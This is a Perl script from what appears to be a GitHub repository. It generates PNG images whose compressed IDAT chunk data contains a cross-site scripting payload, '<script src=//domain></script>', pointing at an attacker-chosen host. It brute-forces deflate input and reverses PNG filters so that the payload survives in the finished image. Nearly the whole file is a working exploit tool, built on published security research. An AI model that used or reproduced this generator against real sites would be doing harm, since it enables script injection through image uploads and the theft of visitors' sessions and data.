-
Notifications
You must be signed in to change notification settings - Fork 15
/
Copy pathold_backup.pl
158 lines (129 loc) · 4.69 KB
/
old_backup.pl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
#!/usr/bin/perl
#
# PNG IDAT chunks ~ payload generator
# Credits to: @Adam_Logue || @fin1te || idontplaydarts
#
# https://www.adamlogue.com/revisiting-xss-payloads-in-png-idat-chunks/
# https://whitton.io/articles/xss-on-facebook-via-png-content-types/
# https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
#
use strict;
use warnings;
no warnings 'portable'; # Hexadecimal number > 0xffffffff non-portable
use GD;
use POSIX;
use Getopt::Long;
use String::HexConvert ':all'; # Wrapper around pack and unpack
use IO::Compress::Deflate qw(deflate $DeflateError); # Write RFC 1950 compressed data to files/buffers
# Command line options
my $options = GetOptions(
"help" => \my $opt_help,
"domain" => \my $opt_domain,
"output" => \my $opt_output
);
print "[ PNG IDAT chunks ~ payload generator ]\n\n";
help() if $opt_help;
my ($domain, $output) = @ARGV;
if(not defined($opt_domain)) {
print "[?] Usage: perl $0 -domain xxe.cz -output xss.png\n";
die("[?] More info: perl $0 -help\n\n");
}
elsif(not defined($opt_output)) {
$output = "xss_chunks.png";
}
# Config variables
my $domain_length = length($domain);
my $brute_start = "0x"."11" x $domain_length;
my $brute_end = "0x"."ff" x $domain_length;
my $payload = uc("<script src=//".$domain."></script>");
my $hex_payload = ascii_to_hex($payload);
my $hex_found;
# Main subs
my @bytes = bruteforce(); # GZDeflate payload fuzzing
my @png_array = png_filters(@bytes); # Reversing PNG filters (1, 3)
create_png(@png_array); # Generating .png file with chunks test
sub bruteforce {
print "[i] Starting bruteforce\n";
print "[i] Domain: ".$domain."\n";
if($domain_length > 6) {
print "[?] Domain too long ~ it might now work!\n";
}
print "[i] Payload: ".$payload."\n";
print "[i] It will take some time ~ please wait :)\n\n";
# Append & Prepend 0x00 -> 0xff to the hex_payload
for (my $i = eval($brute_start); $i < eval($brute_end); $i++) {
my $brute = sprintf("%x",$i);
# Binary data for GZDeflate
my $bin_brute = hex_to_ascii("f399281922111510691928276e6e".$brute."1f576e69b16375535b6f0e7f");
my $out; # GZDeflate output as a scalar reference
deflate \$bin_brute => \$out or die "Deflate failed: $DeflateError\n"; # PHP GZDeflate
if (index(uc($out), $payload) != -1) { # Search payload in uppercase GZDeflate output
print "[!] Lucky one ~ bruteforce successfully completed\n";
print "[i] Trying to apply PNG filters\n\n";
$hex_found = ascii_to_hex($bin_brute);
my @bytes = map "0x$_", $hex_found =~ /../sg; # Hex bytes need to be separated 0x13, 0x37, ...
return @bytes;
# die;
}
}
die("[x] Failed to bruteforce payload :(\n\n");
}
sub png_filters {
my @bytes = my @bytes2 = @_;
# http://www.libpng.org/pub/png/spec/1.2/PNG-Filters.html
# Reverse PNG Filter type 1: Sub
# Sub(x) + Raw(x-bpp)
for (my $i = 0; $i < (scalar @bytes - 3); $i++){
$bytes[$i+3] = sprintf("0x%x",((hex($bytes[$i+3]) + hex($bytes[$i])) % 256));
}
# Reverse PNG Filter type 3: Average
# Average(x) + floor((Raw(x-bpp)+Prior(x))/2)
for (my $i = 0; $i < (scalar @bytes2 - 3); $i++){
$bytes2[$i+3] = sprintf("0x%x",((hex($bytes2[$i+3]) + floor(hex($bytes2[$i]) / 2)) % 256));
}
my @png_array = (@bytes, @bytes2);
print "[i] PNG filters done\n";
return @png_array;
}
sub create_png {
my (@png_array) = @_;
print "[i] Generating output file\n\n";
# Create a new image
my $img = new GD::Image(32,32,1); # Set 1 to Truecolor (24 bits of color data), default is 8-bit palette
my $color = $img->colorAllocate(0,0,0); # Allocate black color
$img->fill(0,0,$color); # Fill background with black
my $i = my $x = 0;
while ($i < (scalar @png_array)) {
# Allocate some colors
my $r = hex($png_array[$i] || 0);
my $g = hex($png_array[$i + 1] || 0);
my $b = hex($png_array[$i + 2] || 0);
$color = $img->colorAllocate($r,$g,$b);
$img->setPixel($x,0,$color);
$i += 3;
$x += 1;
}
if (index(uc($img->png), $payload) != -1) {
print "[!] PNG with payload successfully generated\n";
print "[!] Hex payload: ".$hex_found."\n";
# Convert into png data
open my $out, '>', $output or die;
binmode $out;
print $out $img->png;
print "[i] File saved to: ".$output."\n\n";
}
else {
print "[x] Bad png file, this might not work\n\n";
}
}
sub help {
print "[?] Visit GitHub for help ~ xexexe\n";
}
# strings output.png
# hexdump -c output.png
# apt-get install libgd-perl
# f399281922111510691928276e6e".$brute."1f576e69b16375535b6f0e7f
# 7ff399281922111510691928276e6e".$brute."1f576e69b16375535b6f
#
# php -r "echo gzdeflate(hex2bin('f399281922111510691928276e6e562e2c1e581b1f576e69b16375535b6f0e7f')) . PHP_EOL;"
# php -r "echo gzdeflate(hex2bin('7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f')) . PHP_EOL;"